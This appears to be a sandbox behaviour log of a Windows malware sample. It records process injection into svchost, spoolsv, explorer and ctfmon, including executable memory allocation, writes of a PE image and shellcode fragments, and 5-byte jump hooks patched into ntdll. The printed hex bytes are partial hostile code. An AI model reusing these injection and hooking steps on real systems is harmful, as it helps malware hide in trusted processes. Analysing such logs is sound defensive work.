Memory written PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: 890000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2031645609
Memory attributes changed PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031646643
Memory written PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 F8 83 success or wait 2031704567
Memory allocated PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2031729483
Memory attributes changed PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031731766
Memory attributes changed PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031733061
Memory attributes changed PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031749320
Memory written PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2033439134
Thread delayed Time: 0 TID: 4214 success or wait 2033442802
Memory written PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2033511940
Memory allocated PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: 990000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2033543172
System info queried Type: BasicInformation success or wait 2033545673
System info queried Type: ProcessorInformation success or wait 2033546581
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2033547517
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2033550107
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2033558819
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2033560750
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2033562025
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2033562328
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2033562926
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2033563426
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2033567996
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1F70000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2033569111
System info queried Type: BasicInformation success or wait 2033572473
System info queried Type: ProcessorInformation success or wait 2033573072
Memory written PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: 990000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2033600432
Memory attributes changed PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2033607814
Memory written PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 08 84 success or wait 2033657848
Memory allocated PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2033666079
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2033668792
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2033671498
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2033689470
Memory written PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2035753773
Thread delayed Time: 0 TID: 4214 success or wait 2035755100
Memory written PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2035778576
Memory allocated PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: A40000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2035779727
System info queried Type: BasicInformation success or wait 2035780567
System info queried Type: ProcessorInformation success or wait 2035781128
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2035797868
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2035798903
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2035815745
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2035816220
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2035817347
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2035818135
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2035818549
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2035818962
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2035820340
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1F70000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2035820837
System info queried Type: BasicInformation success or wait 2035821730
System info queried Type: ProcessorInformation success or wait 2035822078
Memory written PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: A40000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2035851012
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2035851317
Memory written PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 13 84 success or wait 2035873679
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write conflicting addresses 2035875760
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB16000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write conflicting addresses 2035875860
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2035875955
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035876137
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035877121
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035877223
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2035879144
Thread created PID: 1636 TID: 3448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2035881266
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2035881989
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035882103
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035883841
Thread created PID: 1636 TID: 3452 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2035884120
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035884274
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2036753150
Thread delayed Time: 0 TID: 4214 success or wait 2036753496
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2036753830
System info queried Type: BasicInformation success or wait 2036754039
System info queried Type: ProcessorInformation success or wait 2036754264
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2036784567
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036785026
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2036815875
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036815957
System info queried Type: BasicInformation success or wait 2036816088
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036816145
System info queried Type: ProcessorInformation success or wait 2036816341
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036816546
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036816751
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036816893
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036817326
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2036817381
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036817768
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036818019
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036818182
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036818253
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2036818486
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036818775
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2036819178
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2036819261
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036819551
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2036819806
System info queried Type: BasicInformation success or wait 2036819852
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036820308
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2036820587
System info queried Type: ProcessorInformation success or wait 2036820777
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036821464
System info queried Type: BasicInformation success or wait 2036822061
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB76E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036822112
System info queried Type: ProcessorInformation success or wait 2036822272
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2036848522
Thread created PID: 1636 TID: 3896 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2036849043
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2036849363
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 12 84 success or wait 2036873800
Thread delayed Time: 0 TID: 4214 success or wait 2036874397
Thread created PID: 1636 TID: 3912 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2036874832
Thread delayed Time: 0 TID: 4214 success or wait 2036876446
Thread delayed Time: 0 TID: 4214 success or wait 2036876589
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036876651
System info queried Type: BasicInformation success or wait 2036876790
System info queried Type: ProcessorInformation success or wait 2036876921
Memory allocated PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2036877456
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036877822
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036878261
Memory attributes changed PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036878391
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036878493
Memory attributes changed PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036878706
Memory attributes changed PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036878973
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036879243
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036879457
Memory written PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2037985901
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2037987153
Thread delayed Time: 0 TID: 4214 success or wait 2037987415
Memory written PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2038029443
Thread delayed Time: 0 TID: 4214 success or wait 2038031624
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038032514
